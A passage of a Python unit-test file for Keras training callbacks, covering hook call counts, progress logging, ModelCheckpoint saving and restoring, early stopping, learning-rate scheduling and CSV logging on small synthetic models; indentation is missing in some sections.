import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
# Shared sizes for the synthetic datasets and models used throughout
# these callback tests.
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
  """Counts the number of times each callback method was run.

  Attributes:
    method_counts: dict. Contains the counts of time each callback method was
      run.
  """

  def __init__(self):
    # BUGFIX: initialize the base Callback class before patching hooks;
    # the original skipped super().__init__() entirely.
    super(Counter, self).__init__()
    self.method_counts = collections.defaultdict(int)
    methods_to_count = [
        'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
        'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
        'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
        'on_test_begin', 'on_test_end', 'on_train_batch_begin',
        'on_train_batch_end', 'on_train_begin', 'on_train_end'
    ]
    # Replace each hook with a counting wrapper around the original method.
    for method_name in methods_to_count:
      setattr(self, method_name,
              self.wrap_with_counts(method_name, getattr(self, method_name)))

  def wrap_with_counts(self, method_name, method):
    """Returns a wrapper that increments `method_counts[method_name]`."""

    def _call_and_count(*args, **kwargs):
      self.method_counts[method_name] += 1
      return method(*args, **kwargs)

    return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
  """Returns (Sequence, None), mirroring the (x, y) shape of `_get_numpy`."""

  class _ConstantSequence(keras.utils.data_utils.Sequence):
    # Five identical batches of two all-ones samples each.

    def __getitem__(self, _):
      return np.ones((2, 10)), np.ones((2, 1))

    def __len__(self):
      return 5

  return _ConstantSequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
  # Verifies that every Callback hook fires the expected number of times for
  # fit/evaluate/predict, with both numpy-array and Sequence inputs.
  def _check_counts(self, counter, expected_counts):
    """Checks that the counts registered by `counter` are those expected."""
    for method_name, expected_count in expected_counts.items():
      self.assertEqual(
          counter.method_counts[method_name],
          expected_count,
          msg='For method {}: expected {}, got: {}'.format(
              method_name, expected_count, counter.method_counts[method_name]))
  def _get_model(self):
    """Builds a small binary classifier used by every test in this class."""
    layers = [
        keras.layers.Dense(10, activation='relu'),
        keras.layers.Dense(1, activation='sigmoid')
    ]
    model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
    model.compile(
        adam.AdamOptimizer(0.001),
        'binary_crossentropy',
        run_eagerly=testing_utils.should_run_eagerly(),
        experimental_run_tf_function=testing_utils.should_run_tf_function())
    return model
  # NOTE: the data factories in the decorator run at class-definition time.
  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_fit(self, data):
    """Checks hook counts for fit() with validation data over 5 epochs."""
    x, y = data
    val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
    is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
    model = self._get_model()
    counter = Counter()
    model.fit(
        x,
        y,
        validation_data=(val_x, val_y),
        batch_size=2 if not is_sequence else None,
        steps_per_epoch=5 if is_sequence else None,
        epochs=5,
        callbacks=[counter])
    # 5 epochs x 5 train batches = 25 batch calls; 4 val samples at batch
    # size 2 give 2 test batches per epoch = 10 test-batch calls.
    self._check_counts(
        counter, {
            'on_batch_begin': 25,
            'on_batch_end': 25,
            'on_epoch_begin': 5,
            'on_epoch_end': 5,
            'on_predict_batch_begin': 0,
            'on_predict_batch_end': 0,
            'on_predict_begin': 0,
            'on_predict_end': 0,
            'on_test_batch_begin': 10,
            'on_test_batch_end': 10,
            'on_test_begin': 5,
            'on_test_end': 5,
            'on_train_batch_begin': 25,
            'on_train_batch_end': 25,
            'on_train_begin': 1,
            'on_train_end': 1
        })
  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_evaluate(self, data):
    """Checks hook counts for a single evaluate() pass (5 batches)."""
    x, y = data
    is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
    model = self._get_model()
    counter = Counter()
    model.evaluate(
        x,
        y,
        batch_size=2 if not is_sequence else None,
        steps=5 if is_sequence else None,
        callbacks=[counter])
    self._check_counts(
        counter, {
            'on_test_batch_begin': 5,
            'on_test_batch_end': 5,
            'on_test_begin': 1,
            'on_test_end': 1
        })
  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_predict(self, data):
    """Checks hook counts for a single predict() pass (5 batches)."""
    x = data[0]
    is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
    model = self._get_model()
    counter = Counter()
    model.predict(
        x,
        batch_size=2 if not is_sequence else None,
        steps=5 if is_sequence else None,
        callbacks=[counter])
    self._check_counts(
        counter, {
            'on_predict_batch_begin': 5,
            'on_predict_batch_end': 5,
            'on_predict_begin': 1,
            'on_predict_end': 1
        })
  def test_callback_list_methods(self):
    """CallbackList should forward batch-level hooks to its callbacks."""
    counter = Counter()
    callback_list = keras.callbacks.CallbackList([counter])
    batch = 0
    callback_list.on_test_batch_begin(batch)
    callback_list.on_test_batch_end(batch)
    callback_list.on_predict_batch_begin(batch)
    callback_list.on_predict_batch_end(batch)
    self._check_counts(
        counter, {
            'on_test_batch_begin': 1,
            'on_test_batch_end': 1,
            'on_predict_batch_begin': 1,
            'on_predict_batch_end': 1
        })
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
training_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'.*1/2\n'
r'.*80/80.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*\n'
r'.*2/2\n'
r'.*80/80.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 6: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 7: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=30,
period=100) # The period should be ignored (this test tests this).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 8: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegexp(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1]] * 16
train_label = [[0]] * 16
ds = dataset_ops.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
class Bias(base_layer.Layer):
def build(self, input_shape):
self.bias = self.add_variable('bias', (1,), initializer='zeros')
def call(self, inputs):
return inputs + self.bias
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
  def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
    """Returns a test verifying load_weights_on_restart=True restores state.

    Args:
      save_weights_only: forwarded to each ModelCheckpoint under test; the
        class body materializes this factory for both True and False.
    """
    def func(self):
      (model, train_ds, filepath, weights_after_one_more_epoch
      ) = self._run_load_weights_on_restart_test_common_iterations()
      # Sleep for some short time period ensuring the files are created with
      # a different time (in MacOS OSS the granularity is only 1 second).
      time.sleep(2)
      callback = keras.callbacks.ModelCheckpoint(
          filepath=filepath,
          save_weights_only=save_weights_only,
          load_weights_on_restart=True)
      model.fit(train_ds, epochs=1, callbacks=[callback])
      weights_after_model_restoring_and_one_more_epoch = model.get_weights()
      self.assertEqual(
          callback._get_most_recently_modified_file_matching_pattern(filepath),
          filepath.format(epoch=1))
      model.fit(
          train_ds,
          epochs=1,
          callbacks=[
              keras.callbacks.ModelCheckpoint(
                  filepath=filepath,
                  save_weights_only=save_weights_only,
                  load_weights_on_restart=True)
          ])
      weights_with_one_final_extra_epoch = model.get_weights()
      # Asserting the weights one epoch after initial fitting and another epoch
      # after that are closed, if a ModelCheckpoint with
      # load_weights_on_restart=True is given (so the model is restored at the
      # beginning of training).
      self.assertAllClose(weights_after_one_more_epoch,
                          weights_after_model_restoring_and_one_more_epoch)
      self.assertNotAllClose(weights_after_one_more_epoch,
                             weights_with_one_final_extra_epoch)
    return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
  def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
    """With restore_best_weights=True training ends on the best epoch's weights."""
    class DummyModel(object):
      # Minimal model stand-in exposing only what EarlyStopping touches:
      # stop_training, get_weights and set_weights.
      def __init__(self):
        self.stop_training = False
        self.weights = -1
      def get_weights(self):
        return self.weights
      def set_weights(self, weights):
        self.weights = weights
      def set_weight_to_epoch(self, epoch):
        # Encode "the weights as of `epoch`" as the epoch number itself.
        self.weights = epoch
    early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
                                               patience=2,
                                               restore_best_weights=True)
    early_stop.model = DummyModel()
    losses = [0.2, 0.15, 0.1, 0.11, 0.12]
    # The best configuration is in the epoch 2 (loss = 0.1000).
    epochs_trained = 0
    early_stop.on_train_begin()
    for epoch in range(len(losses)):
      epochs_trained += 1
      early_stop.model.set_weight_to_epoch(epoch=epoch)
      early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
      if early_stop.model.stop_training:
        break
    # The best configuration is in epoch 2 (loss = 0.1000),
    # and while patience = 2, we're restoring the best weights,
    # so we end up at the epoch with the best weights, i.e. epoch 2
    self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
  def test_ReduceLROnPlateau(self):
    """ReduceLROnPlateau leaves lr alone for min_delta=0 but reduces it by
    `factor` when a huge min_delta makes every epoch count as no-improvement.
    """
    with self.cached_session():
      np.random.seed(1337)
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)
      y_test = keras.utils.to_categorical(y_test)
      y_train = keras.utils.to_categorical(y_train)

      def make_model():
        # Fixed seeds so both model instances start from identical weights.
        random_seed.set_random_seed(1234)
        np.random.seed(1337)
        model = testing_utils.get_small_sequential_mlp(
            num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
        model.compile(
            loss='categorical_crossentropy',
            optimizer=gradient_descent.SGD(lr=0.1))
        return model

      # TODO(psv): Make sure the callback works correctly when min_delta is
      # set as 0. Test fails when the order of this callback and assertion is
      # interchanged.
      model = make_model()
      cbks = [
          keras.callbacks.ReduceLROnPlateau(
              monitor='val_loss',
              factor=0.1,
              min_delta=0,
              patience=1,
              cooldown=5)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=2,
          verbose=0)
      # min_delta=0: loss improvements count, so lr stays at its initial 0.1.
      self.assertAllClose(
          float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)

      model = make_model()
      # This should reduce the LR after the first epoch (due to high epsilon).
      cbks = [
          keras.callbacks.ReduceLROnPlateau(
              monitor='val_loss',
              factor=0.1,
              min_delta=10,
              patience=1,
              cooldown=5)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=2,
          verbose=2)
      # lr reduced once by factor 0.1: 0.1 -> 0.01.
      self.assertAllClose(
          float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
  def test_ReduceLROnPlateau_backwards_compatibility(self):
    """The deprecated `epsilon` kwarg warns and is remapped to `min_delta`."""
    with test.mock.patch.object(logging, 'warning') as mock_log:
      reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
      # A deprecation warning must have been logged for `epsilon`.
      self.assertRegexpMatches(
          str(mock_log.call_args), '`epsilon` argument is deprecated')
    # The old attribute must not survive; its value lands in `min_delta`.
    self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
    self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
    self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
  def test_CSVLogger(self):
    """CSVLogger writes a parseable file, supports append mode, and writes
    exactly one header even when the callback object is reused.
    """
    with self.cached_session():
      np.random.seed(1337)
      temp_dir = self.get_temp_dir()
      self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
      filepath = os.path.join(temp_dir, 'log.tsv')
      sep = '\t'
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)
      y_test = keras.utils.to_categorical(y_test)
      y_train = keras.utils.to_categorical(y_train)

      def make_model():
        np.random.seed(1337)
        model = testing_utils.get_small_sequential_mlp(
            num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
        model.compile(
            loss='categorical_crossentropy',
            optimizer=gradient_descent.SGD(lr=0.1),
            metrics=['accuracy'])
        return model

      # case 1, create new file with defined separator
      model = make_model()
      cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1,
          verbose=0)
      assert os.path.exists(filepath)
      with open(filepath) as csvfile:
        # Let the csv sniffer verify the requested separator was used.
        dialect = csv.Sniffer().sniff(csvfile.read())
      assert dialect.delimiter == sep
      del model
      del cbks

      # case 2, append data to existing file, skip header
      model = make_model()
      cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1,
          verbose=0)

      # case 3, reuse of CSVLogger object
      model.fit(
          x_train,
          y_train,
